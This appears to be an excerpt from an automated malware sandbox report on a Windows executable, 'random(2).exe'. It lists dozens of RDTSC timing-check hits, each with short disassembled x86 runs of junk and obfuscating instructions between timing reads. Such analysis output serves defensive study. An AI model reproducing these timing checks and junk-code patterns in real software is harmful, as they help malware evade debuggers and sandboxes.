                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6566 second address: 7D6591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F83146B40D7h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6591 second address: 7D6597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D686F second address: 7D68B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jns 00007F83146B40C6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jng 00007F83146B40CAh 0x0000001e pushad 0x0000001f push eax 0x00000020 pop eax 0x00000021 jmp 00007F83146B40D6h 0x00000026 je 00007F83146B40C6h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6A25 second address: 7D6A2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6A2A second address: 7D6A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6A34 second address: 7D6A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F8314EA918Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jng 00007F8314EA919Eh 0x00000014 jno 00007F8314EA9188h 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6BA2 second address: 7D6BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6BA8 second address: 7D6BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6BAC second address: 7D6BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6D08 second address: 7D6D0D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D7156 second address: 7D7176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F83146B40D3h 0x0000000c jbe 00007F83146B40C6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D7895 second address: 7D78A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F8314EA9186h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D78A2 second address: 7D78A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D78A6 second address: 7D78AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D78AC second address: 7D78BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F83146B40CAh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D78BF second address: 7D78E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9197h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F8314EA9186h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D7E11 second address: 7D7E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F83146B40C6h 0x0000000a ja 00007F83146B40C6h 0x00000010 js 00007F83146B40C6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F83146B40D6h 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7DA275 second address: 7DA285 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8314EA9192h 0x00000008 js 00007F8314EA9186h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7DA285 second address: 7DA28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7DEB47 second address: 7DEB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7DEB4B second address: 7DEB4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7A95FC second address: 7A9603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E36E1 second address: 7E36E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E36E7 second address: 7E36F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E3874 second address: 7E3883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F83146B40CAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E3883 second address: 7E3888 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E3888 second address: 7E38A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007F83146B40C6h 0x00000012 pop ecx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E38A4 second address: 7E38A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A0A second address: 7E4A3D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F83146B40C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007F83146B40DEh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A3D second address: 7E4A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8314EA9186h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A4C second address: 7E4A5B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A5B second address: 7E4A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A61 second address: 7E4A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A65 second address: 7E4A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4A69 second address: 7E4AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c je 00007F83146B40DEh 0x00000012 jo 00007F83146B40D8h 0x00000018 jmp 00007F83146B40D2h 0x0000001d pop eax 0x0000001e sub dword ptr [ebp+122D306Fh], esi 0x00000024 call 00007F83146B40C9h 0x00000029 jnc 00007F83146B40DCh 0x0000002f push eax 0x00000030 push ebx 0x00000031 jmp 00007F83146B40D7h 0x00000036 pop ebx 0x00000037 mov eax, dword ptr [esp+04h] 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e pushad 0x0000003f popad 0x00000040 pop eax 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4AE3 second address: 7E4B12 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8314EA9188h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F8314EA9193h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jo 00007F8314EA918Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4B12 second address: 7E4B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E4E59 second address: 7E4E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8314EA9196h 0x00000009 popad 0x0000000a jnp 00007F8314EA918Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E505D second address: 7E5067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F83146B40C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E56DD second address: 7E56EF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8314EA9186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E56EF second address: 7E56F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E56F4 second address: 7E5724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 mov di, dx 0x0000000b mov si, bx 0x0000000e nop 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007F8314EA9194h 0x00000016 pop ecx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E5A71 second address: 7E5A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E5C3E second address: 7E5C91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9198h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F8314EA9188h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 sub edi, dword ptr [ebp+122D3B6Dh] 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f jng 00007F8314EA918Ch 0x00000035 jl 00007F8314EA9186h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E61BA second address: 7E61C4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E61C4 second address: 7E624C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8314EA9193h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8314EA9190h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F8314EA9188h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c sub esi, dword ptr [ebp+122D3A09h] 0x00000032 push 00000000h 0x00000034 call 00007F8314EA9196h 0x00000039 add dword ptr [ebp+122D1CE9h], eax 0x0000003f pop esi 0x00000040 push 00000000h 0x00000042 call 00007F8314EA918Bh 0x00000047 pop edi 0x00000048 xchg eax, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jne 00007F8314EA9186h 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E624C second address: 7E6250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E6250 second address: 7E6256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E6256 second address: 7E6276 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F83146B40D5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E6276 second address: 7E627C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E6A4E second address: 7E6A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F83146B40C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E8572 second address: 7E85B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c js 00007F8314EA918Bh 0x00000012 push ecx 0x00000013 movsx esi, bx 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 movzx edi, ax 0x0000001c push 00000000h 0x0000001e jnc 00007F8314EA9187h 0x00000024 push eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E85B1 second address: 7E85BF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E85BF second address: 7E85C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E9051 second address: 7E90BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 jo 00007F83146B40D6h 0x0000000d jne 00007F83146B40D0h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F83146B40C8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e sub dword ptr [ebp+124465CFh], esi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F83146B40C8h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jne 00007F83146B40C6h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E90BF second address: 7E90CD instructions: 0x00000000 rdtsc 0x00000002 js 00007F8314EA9186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E9B9B second address: 7E9BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E9BA0 second address: 7E9BB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F8314EA9186h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E9BB7 second address: 7E9BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7EA579 second address: 7EA5D5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8314EA9188h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jg 00007F8314EA9194h 0x00000013 nop 0x00000014 mov esi, dword ptr [ebp+122D235Fh] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F8314EA9188h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 cld 0x00000037 push 00000000h 0x00000039 mov esi, dword ptr [ebp+122D2DEEh] 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7EA5D5 second address: 7EA5DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7ECBC9 second address: 7ECBE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007F8314EA9197h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7ACD15 second address: 7ACD19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7ACD19 second address: 7ACD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8314EA9190h 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F8314EA9186h 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7ACD41 second address: 7ACD71 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F83146B40C6h 0x00000008 js 00007F83146B40C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 jns 00007F83146B40C6h 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F83146B40D2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7ACD71 second address: 7ACD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7ACD75 second address: 7ACD84 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F83146B40C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7ACD84 second address: 7ACD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F0E5E second address: 7F0E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F0E64 second address: 7F0EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8314EA9198h 0x0000000a jmp 00007F8314EA9196h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007F8314EA9195h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F0EB3 second address: 7F0EB9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F2437 second address: 7F2440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F2440 second address: 7F2444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F33C3 second address: 7F3449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bl, 81h 0x0000000c call 00007F8314EA9198h 0x00000011 mov bl, 49h 0x00000013 pop edi 0x00000014 push 00000000h 0x00000016 movzx ebx, bx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F8314EA9188h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 call 00007F8314EA918Ah 0x0000003a mov ebx, dword ptr [ebp+122D380Dh] 0x00000040 pop edi 0x00000041 mov dword ptr [ebp+122D2E2Ah], edx 0x00000047 xchg eax, esi 0x00000048 push esi 0x00000049 pushad 0x0000004a jp 00007F8314EA9186h 0x00000050 jmp 00007F8314EA9192h 0x00000055 popad 0x00000056 pop esi 0x00000057 push eax 0x00000058 pushad 0x00000059 push edi 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F26D6 second address: 7F26DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F358C second address: 7F3590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F5392 second address: 7F5398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F465F second address: 7F4664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F54C7 second address: 7F54E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
